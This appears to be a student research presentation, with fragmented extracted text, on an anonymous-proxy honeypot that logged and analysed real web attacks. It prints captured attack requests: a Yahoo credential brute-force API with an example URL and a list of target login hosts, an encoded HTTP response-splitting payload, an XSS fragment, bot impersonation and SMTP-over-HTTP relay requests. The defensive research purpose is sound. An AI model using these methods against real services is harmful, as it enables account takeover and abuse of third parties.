Web Security Project

chunkyscreechServers

Dec 4, 2013 (4 years and 28 days ago)

111 views

Creating an anonymous proxy server to monitor and

Analyze new web based attacks


Mentors:

Amichai Shulman

Eldad Chai


Students:

Nadav Amit

Dani Daniel

Main Goals



1
. Being able to log real malicious web based attacks.

2
. Identify new malicious web attacks.

3
. Determine which attacks are in common use in order



to be able to focus on defending against them.


Main Objectives



1
. Creating a working stable anonymous proxy server that can log real web


based attacks


Web hackers usually use anonymous servers to avoid


getting detected.

2
. Creating a tool that can analyze the logs in order to detect patterns of


web based attacks and create statistics of common used attacks.


Project Goals & Objectives

Proxy Server

On
VMWare

Honey Pot

Machine

Computer A

Computer B

Hacker

Web Server

Project Architecture

Data Search &
Index Tool

Highly Anonymous Proxy

Architecture Components

1
.
Proxy Server



Unix based machine


Installed on a
VMWare

machine (easy to reconstruct if attacked)


Based on a “
Privoxy
” server, writes all connections logs to local files.


The server also runs an FTP server to allow easy extraction of data.


GeoIP

API is used to analyze the source IP of attackers


Encoding of low
ascii

characters is preformed to help attack analyzing (like EOF etc.).


Cron

job for archiving the logs



2
.
Backup Agent


Cobian

Backup


Unzip script


3
.
Splunk



Data indexing and search tool


Enables logging of known attacks


Enables query and analysis of accesses


Fields and tags were created in order to allow easy data extraction.


Attack Purpose


retrieve Yahoo login credentials.


Attack Scenario
-

Around the world there are many Yahoo severs (to allow share loading, backup etc..),




The communication Between these servers is done through a web API.



Yahoo
Brute
Force Attack

Hackers use this interface

To impersonate servers and
Retrieve users credentials!


How Is It Done?

If you just try to login to yahoo too many times you will be requested to decode a “
Captcha
”,

But if you just use the following API


“/
config
/
isp_verify_user?l
=<
SomeUsername
>&p=<
SomePassword
>”

Against a yahoo server you can verify that a certain username exists, and than brute force to verify

Which password grants access to the account.


For Example
-


http://
124.108.120.50
/config/isp_verify_user?l=israel&p=israeli


Attack Method


using anonymous proxies to try logging in with multiple use names and passwords


on Yahoo servers. Since there are many Yahoo servers around the world which are not synchronized, it
is possible to try many of them. In addition, once you add Proxy servers into the equation (by
multiplying)
-

you get even more








Yahoo

Brute Force Attack








Yahoo

Brute Force Attack

Many tools to do so using with and without proxies:








Yahoo
Brute
Force Attack

This diagram demonstrates the amount of
attempts through our proxy in a
10
day period.

This is only from our proxy!


In Blue


successful attacks


In Red


response
999
, meaning the server
detected the attack.

edit.yahoo.com

login.yahoo.com

edit.europe.yahoo.com

edit.in.yahoo.com

e
4
.edit.cnb.yahoo.com

e
3
.yahoo.co.kr

edit.vip.tpe.yahoo.com

l
30
.login.scd.yahoo.com

e
3
.member.ukl.yahoo.com

e
1
.member.ukl.yahoo.com

e
2
.member.ukl.yahoo.com

e
4
.member.ukl.yahoo.com

e
5
.member.ukl.yahoo.com

e
6
.member.ukl.yahoo.com

sbc
1
.login.dcn.yahoo.com

e
3
.edit.cnb.yahoo.com

l
2
.login.dcn.yahoo.com

l
3
.login.dcn.yahoo.com


l
4
.login.dcn.yahoo.com

l
5
.login.dcn.yahoo.com

l
6
.login.dcn.yahoo.com

l
7
.login.dcn.yahoo.com

l
8
.login.dcn.yahoo.com

l
9
.login.dcn.yahoo.com

l
10
.login.dcn.yahoo.com

l
11
.login.dcn.yahoo.com

l
12
.login.dcn.yahoo.com

l
13
.login.dcn.yahoo.com

l
14
.login.dcn.yahoo.com

l
15
.login.dcn.yahoo.com

l
16
.login.dcn.yahoo.com

l
18
.login.dcn.yahoo.com

l
19
.login.dcn.yahoo.com

l
20
.login.dcn.yahoo.com

l
22
.login.dcn.yahoo.com

l
23
.login.dcn.yahoo.com


l
29
.login.dcn.yahoo.com

l
30
.login.dcn.yahoo.com

sbc
1
.login.vip.dcn.yahoo.com

e
1
.edit.vip.sc
5
.yahoo.com

l
1
.login.scd.yahoo.com

l
2
.login.scd.yahoo.com

l
3
.login.scd.yahoo.com

l
4
.login.scd.yahoo.com

l
5
.login.scd.yahoo.com

l
6
.login.scd.yahoo.com

l
7
.login.scd.yahoo.com

l
8
.login.scd.yahoo.com

l
9
.login.scd.yahoo.com

l
10
.login.scd.yahoo.com

l
11
.login.scd.yahoo.com

l
12
.login.scd.yahoo.com

l
13
.login.scd.yahoo.com

l
15
.login.scd.yahoo.com


Typical Attack headers
-



Jun
06 12
:
22
:
06.101
b
2
caeb
90
Analysis:
ip
:
24.86.107.62

Country: Canada

GET /
config
/
isp_verify_user?l
=
hu.&p
=
lillian

HTTP/
1.0

Host:
203.212.170.100

Referer
:

http://
203.212.170.100

Accept
-
Language: en

X
-
Forwarded
-
For:

77.125.93.72
:
8118
,
yahoo.com

Cookie: Y=v=
1
-
;

Connection: close


Jun
06 12
:
22
:
06.292
b
34
afb
90
Analysis:
ip
:
201.68.195.20

Country: Brazil

GET /
config
/
isp_verify_user?l
=
angel_annabel&p
=
2020
HTTP/
1.0

Host:
124.108.120.50

YahooRemoteIP
:
217.12.5.161

Referer
:

http://
124.108.120.50

Accept
-
Language: en

Connection: Close

X
-
Forwarded
-
For:
69.147.112.216
,
google.com

Accept: */*


Jun
06 12
:
22
:
10.483
a
7497
b
90
Analysis:
ip
:
75.184.119.157

Country: United States

GET /
config
/login?.
patner
=
sbc&login
=david+
2
&passwd=
flag&.save
=
1
HTTP/
1.0

Connection: close

Accept: */*

Accept:
-
Language: en

Host:

l
05
.member.re
3
.yahoo.com

Yahoo
Brute
Force Attack

Attack Description






The essence of HTTP Response Splitting is the attacker's ability to send a single HTTP request that
forces the web server to form an output stream, which is then interpreted by the target as two HTTP
responses instead of one response


Typical Attack headers




May
30 00
:
03
:
58.496 73
c
84
b
90
Analysis:
ip
:
89.149.242.190

ICountry
: Germany

GET
/
lnv
/
viewHTTP
/
1.1
%
20200
%
20
OK%
0
D%
0
ADate:%
20
Sat,%
2030
%
20
May%
202009
%
2003
:
54
:
07
%
20
GMT%
0
D%
0
AServer:%
20
Apache/
1.3
.28
%
20
(Unix)%
20
PHP/
4.3.4
%
0
D%
0
AX
-
Powered
-
By:%
20
PHP/
4.3.4
%
0
D%
0
ASet
-
Cookie:%
20
PHPSESSID=
6019
eb
9689437
d
8
b
69
f
93967
be
7544
a
9
;%
20
path=/;%
20
domain=.sundojungmil.co.kr%
0
D%
0
AExpires:%
20
Thu,
%
2019
%
20
Nov%
201981
%
2008
:
52
:
00
%
20
GMT%
0
D%
0
ACache
-
Control:%
20
no
-
store,%
20
no
-
cache,%
20
must
-
revalidate,%
20
post
-
check=
0
,%
20
pre
-
check=
0
%
0
D%
0
APragma:%
20
no
-
cache%
0
D%
0
AConnection:%
20
close%
0
D%
0
ATransfer
-
Encoding:%
20
chunked%
0
D%
0
AContent
-
Type:%
20
text/html%
0
D%
0
A%
0
D%
0
Ae
3
d%
0
D%
0
A%
0
D%
0
A%
3
Cscript%
20
language=
HTTP/
1.1

Connection: close

Host: forums.lenovo.com

Response Splitting Attack

Attack Description






Taking advantage of a security vulnerability

typically found in

web applications

which allow

code
injection

by malicious web users into the

web pages

viewed by other users


Typical Attack headers




May
29 22
:
20
:
32.730 7
f
452
b
90
Analysis:
ip
:
60.16.140.154

ICountry
: China

GET / HTTP/
1.0

Referer
:
js
/
bdsug.js?v
=
1.1.0.3
><
\
/script>')};
window.onunload
=function(){};
window.onload
=function(){
document.forms
[
0
http://www.baidu.com
/s?ie=gb
2312
&bs=%B
1
%F
9
%E
4
%BF%C
1
%E
8
&sr=&z=&cl=
3
&f=
8
&wd=%B
1
%F
9
%E
4
%BF%C
1
%E
8
%B
0
%CD%C
8
%F
0
%BF%CB%B
1
%F
9
%E
4
%BF&ct=
0

Accept: */*

Accept
-
Language:
zh
-
cn,en
-
us

Cookie: BAIDUID=
33549062
C
228
F
38
D
3
ACF
4
C
8
FDF
85
D
5
C
2
:FG=
1

User
-
Agent: Mozilla/
4.0
(compatible; MSIE
6.0
; Windows NT
5.0
;
Hotbar

4.1.8.0
;
RogueCleaner
;
Alexa

Toolbar)

Host: www.baidu.com

Pragma
: no
-
cache

Connection: close

Cross
-
Site Scripting
Attack

Attack Description







Impersonate Google/Msn bots to access forums and internet sites to insert malicious data.



Typical Attack headers






Jun
06 00
:
28
:
48.276 8
acf
1
b
90
Analysis: ip:
123.149.121.132

ICountry: China

GET /forum
-
20
-
1
.html HTTP/
1.0

Accept: */*

Accept
-
Language: zh
-
cn

User
-
Agent: Mozilla/
5.0
(compatible; Googlebot/
2.1
; +http://www.google.com/bot.html)

Host: xgymcn.
5
d
6
d.com

Pragma: no
-
cache

Connection: close

Bots Impersonation Attack

Attack Description



















Typical Attack headers





Jun
01 17
:
22
:
28.436
add
54
b
90
Analysis:
ip
:
217.86.183.71

ICountry
: Germany

CONNECT
205.188.251.21
:
443

HTTP/
1.0

Host:
205.188.251.21
:
443

Connection: close

SMTP over HTTP Attack

One client can send roughly
500
,
000
e
-
mails per hour!

[http://en.wikipedia.org/wiki/Dark_Mailer]

1.
Automatic posting in forums

2.
Click frauds (simulates clicks to earn money, vote
in poles etc.)


Other Attacks

Attack Types

55.35
%

26.17
%

7.23
%

4.71
%

4.11
%

1.55
%

0.88
%

Yahoo Passwords Brute-Force
SMTP Over HTTP
Google Board Posting
X-site scripting / Response Splitting
Click-Frauds
Proxy Checkers
Crawler-Impersonating
Attacks by Server Type

Servers Distribution in the Internet

http://news.netcraft.com/archives/web_server_survey.html

53.40
%

18.59
%

12.17
%

7.76
%

1.14
%

1.09
%

0.75
%

0.66
%

0.53
%

0.46
%

0.44
%

0.42
%

1.58
%

Apache
Microsoft-IIS
Google
nginx
Baidu
Resin
IBM_HTTP_Server
Yahoo
Squeegit
httpd
FriendFeedServer
lighttpd
Others
47.17
%

23.34
%

12.71
%

5.94
%

4.25
%

0.55
%

Apache
Microsoft
qq.com
Google
nginx
lighttpd
Servers Attacks

Originating Countries

44
%

8
%

8
%

6
%

6
%

5
%

5
%

5
%

2
%

2
%

2
%

1
%

7
%

Germany
United Kingdom
United States
Israel
China
Netherlands
Brazil
Luxembourg
Russian Federation
Malaysia
Australia
France
Other
Dependent of posted website and Proxy location